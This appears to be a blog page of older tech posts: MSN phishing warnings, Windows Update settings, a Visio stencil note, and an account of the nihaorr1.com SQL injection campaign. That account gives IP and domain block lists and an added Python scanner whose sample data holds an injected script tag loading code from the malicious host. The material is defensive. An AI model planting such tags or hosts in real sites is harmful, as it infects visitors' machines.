Beware of PICS FOR MSN FRIENDS Phishing Websites

If you see this kind of message from your MSN/Live Messenger buddy:
(1) Do NOT click on it or log in to that website; it’s a fake!
(2) Tell your buddy to reset his/her MSN/Live password immediately.
Detail in this link:
 
Here is another one, different style, same purpose.  Tell your friend to reset the password immediately!

Joe Smith has asked us to add you to his/her social network of Messenger friends on MeetYourMessenger.co.uk

Hi Bob

I would like to add you to my social network of Messenger friends on MeetYourMessenger.co.uk

-Joe Smith

See invitation from Joe Smith

 

Put a leash on Windows’ automatic updates

Microsoft’s most recent update for Windows caused many people using Check Point’s ZoneAlarm firewall to lose their Internet connection. The patch fixes a potential DNS-related security breach that affects servers and clients alike, so I’m sure Microsoft was compelled to release it as quickly as possible.

That’s little consolation for the many ZoneAlarm users who struggled to regain their network connection. Read more about the problem, and find a link to Check Point’s solution, at Robert Vamosi’s Defense in Depth blog.

The fact is, even with potentially serious security holes such as this appears to be, you can usually wait a day or two before installing the update to make sure the fix doesn’t cause some problems of its own. Simply set Windows Update to download updates automatically but prompt you before installing them, or to alert you when an update is available for download so you can decide when to fetch it and implement it.

In Windows XP, click Start > Run, type sysdm.cpl, and press Enter. Click the Automatic Updates tab and choose either "Download updates for me, but let me choose when to install them," or "Notify me but don’t automatically download or install them." You can also choose "Turn off automatic updates," but I recommend either of the semi-automatic methods. When you’re done, click OK.

Choose either option that prevents Windows updates from being installed automatically. (Credit: Microsoft)

To change your Windows Update settings in Vista, press the Windows key, type windows update, and press Enter. Click Change settings in the left pane, and choose either "Download updates but let me choose whether to install them" or "Check for updates but let me choose whether to download or install them." As with XP, I caution against selecting "Never check for updates (Not recommended)." This is one of the few points on which Microsoft and I agree.

Now get into the habit of watching the tech news wires each Wednesday after Microsoft’s Patch Tuesdays to determine whether an update is going smoothly before applying it manually. Sometimes being first isn’t such a good idea.

Source: http://news.cnet.com/8301-13880_3-9988581-68.html?hhTest=1

Links:
http://news.cnet.com/8301-10789_3-9986625-57.html?hhTest=1
http://news.cnet.com/8301-10789_3-9987632-57.html?hhTest=1

What the hack is this nihaorr1.com/1.js? – updated Apr.19


Found anything special in the following Google search results?
    
Yes: except for the 3rd link, which points to the IIS.net forum, every other destination in the search results has been compromised.  The code between <script src= … and … </script> was planted into the contents of those websites by some kind of malicious hacking mechanism without the webmasters’ awareness.  Do NOT click on any of those links!!!

This thread in the IIS.net forum, Anyone know about www.nihaorr1.com/1.js?, tells part of the story, with a few people discussing their findings.  Basically, once a website is compromised, when a visitor clicks on a link that has the hacking code implanted, the browser is redirected to the www.nihaorr1.com website and 1.js from that website is executed.  Most web visitors would not notice anything except something like "Page cannot be found" shown in the browser, which does not look harmful.  But by then the code has already run on their PCs.  So far, I saw test.exe, 1.js and Yahoo.php pulled from that website to the clients.  Those files are executable; if you have antivirus software installed with up-to-date antivirus definitions, they will be quarantined; if you don’t have it, I don’t know …

Webmasters, especially those running IIS with ASP code and a SQL database in the backend: check your servers, code and databases.  Thousands of websites have been compromised, as shown in the Google search results.  There is no official information yet, but I personally quite agree with rwmorey, eftennis and davcox’s comments in http://forums.iis.net/p/1148917/1867622.aspx.  I will also add new findings in the next few days. [Apr.18]

There are 2 more domains that could serve the same malicious code: aspder.com and 414151.com.  From somewhere, some hackers are trying to plant the code in your web server or SQL database, so your visitors will be redirected to those sites and probably get infected.

Here are more details found in the Malware Domain Blocklist:

The IP address 60.172.219.4 contains

414151..com and a new domain, aspder..com

Source: http://www.robtex.com/ip/60.172.219.4.html

aspder..com resolves, and there are iframes popping up in google:

http://www.google.com/search?q=aspder.com

Needless to say, block this IP and domain. If anyone can download and analyze the iframe, we would appreciate more information. Thanks.

UPDATE: it’s a sql injection attack, see these links for more detail:

http://www.webhostingtalk.com/showthread.php?t=686032
http://www.webhostingtalk.com/showthread.php?p=5062187

These posts also mention twww..nihaorr1..com/1.js

Also in those threads on Web Hosting Talk (the two links above), there are more details about how the hackers plant the code in your web servers and SQL servers.  The following is copied from that site:

Here is a link to shed light on the problem and how to mitigate it –

http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx

Many high profile sites got hit by the injection of early April and also one in early March. Sites like usatoday-dot-com, forbes-dot-com, walmart-dot-com, and on and on. Several thousand sites got hit.

Here are some more links about it –

http://myitforum.com/cs2/blogs/cmosby/archive/2008/04/04/nmidahena-sans-internet-storm-center.aspx

http://isc.sans.org/diary.html?storyid=4210

http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html

Block the following on your proxy servers, home routers and other Internet gateway devices, so your users will not get infected when a website they visit is compromised.  Besides the web and SQL servers, this is how you control the controllable as a server/network administrator.

IPs
60.172.219.4
24.28.193.9
219.153.46.28

Domains
aspder.com
*.aspder.com
nihaorr1.com
*.nihaorr1.com
414151.com
*.414151.com
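As an added example (not from the original post or any of the linked threads), the following Python script turns the indicator list above into a check a webmaster can run against dumped text columns or saved page content: it flags any <script src=...> tag whose host is one of the listed IPs or domains, treating the *.domain entries as "the domain and every subdomain". The sample rows, table and column names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the post above; each domain entry also covers its subdomains.
BLOCKED_DOMAINS = {"aspder.com", "nihaorr1.com", "414151.com"}
BLOCKED_IPS = {"60.172.219.4", "24.28.193.9", "219.153.46.28"}

# Matches the src of a <script> tag whether or not the value is quoted; the
# injected tags in this campaign were written without quotes.
SCRIPT_SRC = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def host_is_blocked(host: str) -> bool:
    """True if host is a listed IP, a listed domain, or a subdomain of one (*.domain)."""
    host = host.lower().rstrip(".")
    if host in BLOCKED_IPS:
        return True
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def injected_script_sources(text: str) -> list:
    """Return the src values of script tags in text that load from a blocked host."""
    hits = []
    for match in SCRIPT_SRC.finditer(text):
        src = match.group(1)
        # Scheme-less "//host/path" is accepted too; relative paths have no host and are skipped.
        host = urlparse(src if "//" in src else "//" + src).hostname
        if host and host_is_blocked(host):
            hits.append(src)
    return hits


def scan_rows(rows):
    """rows: (table, column, key, value) tuples, e.g. dumped from every text column.
    Returns (table, column, key, src) for each value carrying an injected tag."""
    findings = []
    for table, column, key, value in rows:
        for src in injected_script_sources(value or ""):
            findings.append((table, column, key, src))
    return findings


# Constructed sample rows standing in for a content table; the first value has the
# tag appended to a legitimate description, which is how the injected rows looked.
SAMPLE_ROWS = [
    ("Products", "Description", 17,
     "Rack rail kit</title><script src=http://www.nihaorr1.com/1.js></script>"),
    ("Products", "Description", 18, "Cable management arm"),
    ("Pages", "Body", 3, '<p>Welcome</p><script src="/js/site.js"></script>'),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print("injected script in %s.%s (key %s): %s" % finding)
```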

Microsoft also published security advisory 951306; I’m not sure if it’s relevant and need to test and prove it.  [Apr.19]

About Visio Stencil

HP doesn’t; only on one of its certified-engineer websites is there a link that unofficially points to visiocafe.
 

Searching for a Visio stencil or template?

A couple of nights back, I was documenting the rack configuration for a client’s data centre.  Easy enough using a rack configuration tool from one of the major hardware vendors, except that most of us have multi-vendor rack contents and use Microsoft Visio to record the details.  Enter the index of Visio download sites.  Using this I was able to locate and download Visio stencils for Compaq/HP hardware, although Visio stencils for Dell servers seem to be a bit thin on the ground…